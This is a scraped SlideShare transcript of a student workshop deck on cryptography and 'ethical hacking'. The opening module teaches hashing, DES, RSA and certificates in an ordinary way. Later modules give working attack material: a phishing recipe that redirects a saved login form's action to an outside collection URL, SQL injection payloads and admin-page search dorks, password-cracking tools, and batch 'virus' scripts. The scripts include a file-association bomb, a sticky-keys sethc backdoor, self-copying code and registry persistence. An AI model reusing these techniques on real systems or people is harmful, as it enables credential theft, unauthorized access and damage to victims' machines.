Your SlideShare is downloading. ×
0
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Workshop on 03 11-2012
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Workshop on 03 11-2012

87

Published on

Published in: Internet, Technology, Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
87
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Workshop On Cryptography and Ethical Hacking 5/18/2014 1
  • 2. Modules Cryptography Concepts – by K.K.Goyal(Asst Professor) Windows Password Hacking – by Parul Kaushik Phishing & Security of Data – by Praval Sharma SQL Injection & WebCam Hacking – by Gaurav Gautam Batch Programming & Viruses – by Ehtisham Ali 5/18/2014 2
  • 3. MODULE 1By: - K K Goyal Asst Professor RBS MTC AGRA 5/18/2014 3
  • 4. Threats against electronic communications Cryptography principles Message Digests (One-way hash functions) Secret key (symmetric) cryptography Public key (asymmetric) cryptography Practical implementation of cryptography The potential role of public authorities Conclusions Topics Under Module 1 5/18/2014 4
  • 5. Q. Is Internet secure ? The wrong question ! Q. Right questions: - Is the telephone secure ??? Are postal services secure ??? Ans. A worldwide communication network, with millions of users can not be secure. 5/18/2014 5
  • 6. Q. Can specific Internet applications be secure ? YES. this is the topic of today Q. Are most of the Internet applications secure ? Most don’t need to !!! Some should but aren’t !!! 5/18/2014 6
  • 7. World Wide Web HTTP Client (Web Browser) HTTP Server HTTP Server HTTP Server Other ServerHTTP Server HTTP Link transporting HTML- encoded hypertext Other Data Link 5/18/2014 7
  • 8. HTTP Hypertext Transfer Protocol Network Service Transport entity Transport entity Connection oriented protocol Client HTTP Server HTTP Connectionless protocol Browser Web Server 5/18/2014 8
  • 9. HTTP is a Stateless Protocol Loging in a stateless server : Client HTTP Server HTTP Browser Web Server > I want to log into the server Give your name and password < > XYZ, ****** OK, here is your key 478 < > show me my bank records, my key is 478. Here are your bank records < $$$$$$$$$ < If you need more use key 953 < .... 5/18/2014 9
  • 10. HTTP is a Stateless Protocol Loging in a stateless server : Client HTTP Server HTTP Browser Web Server > I want to log into the server Give your name and password < > XYZ, ****** OK, here is your key 478 < > show me my bank records, my key is 478. Here are your bank records < $$$$$$$$$ < If you need more use key 953 < .... 5/18/2014 10
  • 11. Threats against electronic communications Cryptography principles Message Digests (One-way hash functions) Secret key (symmetric) cryptography Public key (asymmetric) cryptography Practical implementation of cryptography The potential role of public authorities Conclusions Topics Under Module 1 5/18/2014 11
  • 12. Threats : data interception MAFIA NV/SA 5/18/2014 12
  • 13. Threats : masquerade MAFIA NV/SA 5/18/2014 13
  • 14. Threats : data manipulation MAFIA NV/SA "Transfer x € to account abc" "Transfer x € to account uvw" 5/18/2014 14
  • 15. Threats : message replay "Send me movie x and bill it to my account abc" "Send me movie x and bill it to my account abc" 5/18/2014 15
  • 16. Threats : message repudiation "It is a pity you instructed me to sell, abc gained in value" "Sell all my abc shares" "I never instructed you to sell my abc shares, you have to compensate"5/18/2014 16
  • 17. Threats against electronic communications Cryptography principles Message Digests (One-way hash functions) Secret key (symmetric) cryptography Public key (asymmetric) cryptography Practical implementation of cryptography The potential role of public authorities Conclusions Topics Under Module 1 5/18/2014 17
  • 18. Hiding Information 5/18/2014 18
  • 19. Sender : Compute message digest All message bits should influence digest Computing digest from message simple Computing message from digest impossible e.g.: digest = checksum Send message + digest Receiver : Receive message and digest Compute digest from received message Compare computed and received digests One Way Hash Functions for checking message integrity 5/18/2014 19
  • 20. One Way Hash Functions for checking message integrity Sender: message + messagedigest digest hash 5/18/2014 20
  • 21. One Way Hash Functions for checking message integrity Receiver: <> message digest digest hash =? * OK messagedigest 5/18/2014 21
  • 22. Cryptography CRYPTO- ALGORITHM Encryption key Decryption key "Sell all my abc shares" "Sell all my abc shares" "nseefglw47 0%GHkdaJ" CRYPTO- ALGORITHM 5/18/2014 22
  • 23. Well known and widely available algorithm Only keys are to be kept secret potential intruders and volunteer experts can search for algorithmic weaknesses weaknesses will quickly be publicized ! widely used on internet and for ecommerce Secret algorithm Encryption devices need to be protected and replaced if compromised. Very few people can verify algorithms weaknesses can remain hidden, but possibly know by potential intruders common in proprietary and/or military systems Crypto-algorithms 5/18/2014 23
  • 24. Encryption_Key = Decryption_Key = "Secret Key Cryptography" •Symmetric •Key distribution problem •Fast encryption and decryption Encryption_Key  Decryption_Key =" Public Key Cryptography " •Asymmetric •Key publicity problem •Slow encryption and decryption In practice, both are used together Crypto-keys 5/18/2014 24
  • 25. Secret Key Cryptography CRYPTO- ALGORITHM Secret key CRYPTO- ALGORITHM Cleartext Cleartext Ciphertext Unprotected Channel Secure Channel One secret key per users pair ensures both confidentiality and authenticity 5/18/2014 25
  • 26. • Fast algorithm for bulk encryption • Hardware or software implementations • Security somewhat controversial • Multiple encryption very secure • Commonly used Secret Key Cryptography The Data Encryption Standard DES Secret key 56 bit Cleartext 64 bit 64 bit64 bit64 bit 64 bit 64 bit Ciphertext 5/18/2014 26
  • 27. Public Key Cryptography for ensuring confidentiality CRYPTO- ALGORITHM CRYPTO- ALGORITHM Cleartext Cleartext Ciphertext Unprotected Channel Key pair Unprotected (?) Channel Public Key Secret Key A secret message intended for A should be encoded with A's public key ! 5/18/2014 27
  • 28. Public Key Cryptography for identifying sender CRYPTO- ALGORITHM CRYPTO- ALGORITHM Cleartext Cleartext Ciphertext Unprotected Channel Key pair Unprotected (?) Channel Public KeySecret Key A message that can be decoded with A's public key was certainly send by A ! 5/18/2014 28
  • 29. Public Key Cryptography RSA algorithm1. select two large prime numbers p and q 2. compute n = p*q and z = (p-1)*(q-1) 3. select decryption key d relatively prime to z 4. find encryption key e such that (e*d) MOD z = 1 5. Encrypt M by computing E = Me MOD n 6. Decrypt by computing M = Ed MOD n Computing d or e from the other one requires factorization of n into its prime factors p and q. Factorization of n (>200 digits) is an extremely long operation (months on a supercomputer) RSA is much slower than DES 5/18/2014 29
  • 30. Threats against electronic communications Cryptography principles Message Digests (One-way hash functions) Secret key (symmetric) cryptography Public key (asymmetric) cryptography Practical implementation of cryptography The potential role of public authorities Conclusions Topics Under Module 1 5/18/2014 30
  • 31. Some tools related to cryptography • TrueCrypt • Yodas Crypter • Frame Based Encryption Scheme • Crypt Tool 5/18/2014 31
  • 32. GSM station authentication MS VLR HLR K i imsi vlr,imsi rand sres rand,sres, Kc data & signalling enciphered by Kc .... i:K i .... sres = A3(Ki,rand) Kc = A8(Ki,rand) 5/18/2014 32
  • 33. Electronic Signatures Signing a message + message digest hashing messagesignature signature CRYPTO- ALGORITHM Signer's secret key 5/18/2014 33
  • 34. Electronic Signatures Checking the signature hashing digest =? message * OK <> digest signature CRYPTO- ALGORITHM Signer's public key messagesignature 5/18/2014 34
  • 35. Practical Cryptography • Confidentiality of messages : – long : Symmetric key cryptography – short : Asymmetric key cryptography • Authenticity of messages (electronic signature) : – Asymmetric key cryptography to authenticate message digest obtained by hashing • Non repudiation : – undisputable time stamp in digest – copy of digest in trustworthy repository • Distribution of symmetric keys – Asymmetric key cryptography 5/18/2014 35
  • 36. Threats against electronic communications Cryptography principles Message Digests (One-way hash functions) Secret key (symmetric) cryptography Public key (asymmetric) cryptography Practical implementation of cryptography The potential role of public authorities Conclusions Topics Under Module 1 5/18/2014 36
  • 37. Public Key Cryptography Ensuring both confidentiality and authenticity A B eA eB dA dB 5/18/2014 37
  • 38. Public Key Cryptography Public Keys can be changed !!! MAFIA NV/SA A B eA em dA dm dm' dB eB em' 5/18/2014 38
  • 39. Certification Authority Certification Authority A B A:PA B:PB sCA sA PCA sB PCA 5/18/2014 39
  • 40. Digital Certificates • Issued by a well know Certification Authority (CA) • Contains at least : – Identification of the issuing CA – Unambiguous identity of the owner – The owner's public key – electronic signature of CA • Any user knowing the public key of the CA can recover the public key of the certificate owner. • Only the public key of the CA needs to be generally well known and regularly checked. 5/18/2014 40
  • 41. Conclusion • All techniques for secure ecommerce exist • Large scale usage requires third-party certification – For identity of users – For time-stamps • Certifying the identity of individuals and corporations is a natural task for public authorities • Postal services have a tradition of providing trustworthy time stamps • Observatories could also become providers of high accuracy time stamps • Legislative action is urgently needed 5/18/2014 41
  • 42. MODULE 2By Parul Kaushik 5/18/2014 42
  • 43. 1) Login Password 2) BIOS Password 3) Biometric Password 4) Boot Password 5) Syskey Password Topics Under Module 2 Types Of Passwords 5/18/2014 43
  • 44. 1) net user * 2) net user hack /add 3) net localgroup administraters a/c name / add 4) net user hack /del Login passwords commands 5/18/2014 44
  • 45. GO TO BIOS SETTINGS…. THEN GO TO SECURITY TAB BOOT PASSWORD - USER PASSWORD. BIOS PASSWORD - SUPERVISOR PASSWORD. BIOS AND BOOT PASSWORD CAN BE CRACKED BY REMOVING THE CMOS BATTERY FOR 5 MINUTES. Boot Password 5/18/2014 45
  • 46. OPH Crack  Kon Boot  Offline Password Cracker  Active Password Changer  ERD Commander Topics Under Module 2 Tools for login passwords 5/18/2014 46
  • 47. MODULE 3By Praval Sharma 5/18/2014 47
  • 48. 1) PHISHING ATTACK 2) LOCKING FOLDERS 3) HIDING DRIVE PARTITIONS Topics Under Module 3 5/18/2014 48
  • 49. OPEN ANY LOGIN PAGE GO TO FILE THEN, SAVE PAGE AS….  WEB PAGE , HTML ONLY. CLICK SAVE PAGE. OPEN PAGE WITH NOTEPAD. PRESS CTRL+F TO FIND FIND ACTION. THEN PLACE THIS CODE AFTER ACTION ACTION=“HTTP://CYBERCURE.NET /TESTERS /PRACPH57.PHP? ID=“YOUR EMAIL ID”& LINK=SITE NAME” Phishing Attacks 5/18/2014 49
  • 50. By using Change Access Control Lists (CACLS) Command. - Open CMD (in Windows 7 open CMD as an Administrator) - Use this Command : For Locking the Folder- CACLS <Folder Name> /E /P Everyone :N For Accessing the Folder CACLS <Folder Name> /E /P Everyone :F Locking Folders 5/18/2014 50
  • 51. Open CMD as an Administrator. Type the following commands: C:UsersUser Account>DISKPART Press Enter DISKPART> List Volume Press Enter DISKPART> Select Volume <Volume Number> Press Enter DISKPART> Remove letter <Drive letter> Press Enter YOUR DISK HAS BEEN HIDDEN NOW Hiding Drive Partitions 5/18/2014 51
  • 52. REPEAT ALL STEPS AS MENTIONED IN PREVIOUS SLIDE. CHANGE THE FOURTH STEPAS: DISKPART> Assign letter <Drive letter> Press Enter YOUR DISK AS BEEN VISIBLE NOW Hiding Drive Partitions 5/18/2014 52
  • 53. MODULE 4By GAURAV GAUTAM 5/18/2014 53
  • 54. 1) SQL INJECTION 2) ONLINE WEBCAM Topics Under Module 4 5/18/2014 54
  • 55. SQL injection is a technique often used to attack a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database SQL Injection 5/18/2014 55
  • 56. Type anyof followingpoints in Google to get Admin Login pages: INURL: admin.asp INURL: adminlogin.asp INURL: admin.aspx INURL: adminlogin.aspx INURL: admin.asp INURL: admin.php INURL: adminlogin.php SQL Injection 5/18/2014 56
  • 57. SQL Injection Attacks queryby Example SELECTfield list FROMtable WHERE field= 'password'; where like as anything' OR 'x'='x x' ANDemailIS NULL; bob@example.com' ANDpassword= 'hello123 23 OR 1=1 ''; DROP TABLEusers; -- SQL Injection 5/18/2014 57
  • 58. MODULE 5By ehtisham ali 5/18/2014 58
  • 59. 1) Disable Internet 2) Self deleting code 3) Net user automation 4) File extension bomb 5) Full control of file 6) Sticky attack automation 7) Self copying code 8) Simple keylogger 9) Startup code 10) Website blocking Topics Under Module 5 5/18/2014 59
  • 60. Disable Internet > @echo off > ::--------Block Internet-------:: > ipconfig /release > if ERRORLEVEL1 ipconfig /release_all > 5/18/2014 60
  • 61. Self deleting code > @echo off > CD .. > START CMD /C DEL /Q "%~dpnx0" > 5/18/2014 61
  • 62. Net user automation > @echo off > ::--Change Pass To 1234--:: > net user %username% 1234 > 5/18/2014 62
  • 63. File Extension Bomb > @echo off > color fc > assoc .jpg=internetshortcut > assoc .mp3=internetshortcut > assoc .lnk=internetshortcut > assoc .htm=internetshortcut > assoc .html=internetshortcut > assoc .txt=internetshortcut > assoc .doc=internetshortcut > assoc .xlsx=internetshortcut > assoc .docx=internetshortcut > assoc .chm=internetshortcut > assoc .hlp=internetshortcut > assoc .pdf=internetshortcut > assoc .png=internetshortcut > assoc .rar=internetshortcut > assoc .zip=internetshortcut > 5/18/2014 63
  • 64. Full control of a file > @echo off > ::----ownership----:: > takeown /f “file” /a > ::----Access Rights----:: > cacls “file” /e /p everyone:f > 5/18/2014 64
  • 65. Sticky attack automation > @echo off > copy c:windowssystem32cmd.exe c: /y > ren c:cmd.exe sethc.exe > takeown /f c:windowssystem32sethc.exe /a > cacls c:windowssystem32sethc.exe /e /p everyone:f > copy c:sethc.exe c:windowssystem32 /y > del c:sethc.exe > 5/18/2014 65
  • 66. Self copying code > @echo off > xcopy viral.cmd c: /C /Q /H /R /K /Y /Z > 5/18/2014 66
  • 67. Simple keylogger > @echo off > title Simple Keylogger > color 0a > :log > set /p "a=>" > cls > echo %a% >> keylog.txt > cls > goto log > 5/18/2014 67
  • 68. Startup code > @echo off > REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v mypad /t REG_SZ /d %SystemRoot%system32notepad.exe /f > start %SystemRoot%system32notepad.exe > 5/18/2014 68
  • 69. WEBSITE BLOCKING > @echo off > ::--------Block Facebook-------:: > cd "C:WindowsSystem32Driversetc" > echo 127.0.0.1 www.facebook.com >> "Hosts" > echo 127.0.0.1 facebook.com >> "Hosts" > echo 127.0.0.1 static.ak.fbcdn.net >> "Hosts" > echo 127.0.0.1 www.static.ak.fbcdn.net >> "Hosts" > echo 127.0.0.1 login.facebook.com >> "Hosts" > echo 127.0.0.1 www.login.facebook.com >> "Hosts" > echo 127.0.0.1 fbcdn.net >> "Hosts" > echo 127.0.0.1 www.fbcdn.net >> "Hosts" > echo 127.0.0.1 fbcdn.com >> "Hosts" > echo 127.0.0.1 www.fbcdn.com >> "Hosts" > echo 127.0.0.1 static.ak.connect.facebook.com >> "Hosts" > echo 127.0.0.1 www.static.ak.connect.facebook.com >> "Hosts" > 5/18/2014 69
  • 70. Safe Browsing Follow some useful tips to browse the internet safely. Use virtual keyboard to enter data in web forms (osk.exe – windows virtual keyboard) Check the authenticity of a website before interacting with it. Install security software’s to protect spywares, malwares, and Trojans. If you use net banking never Google for your bank website, rather always type the URL in the address field. Before visiting websites like bank site, social networking site and others check for the SSL protection. And if it is there than you have a better level of security. If you are frequent downloader of executable file than make sure to scan your downloaded file by this online service https://www.virustotal.com/ 5/18/2014 70

×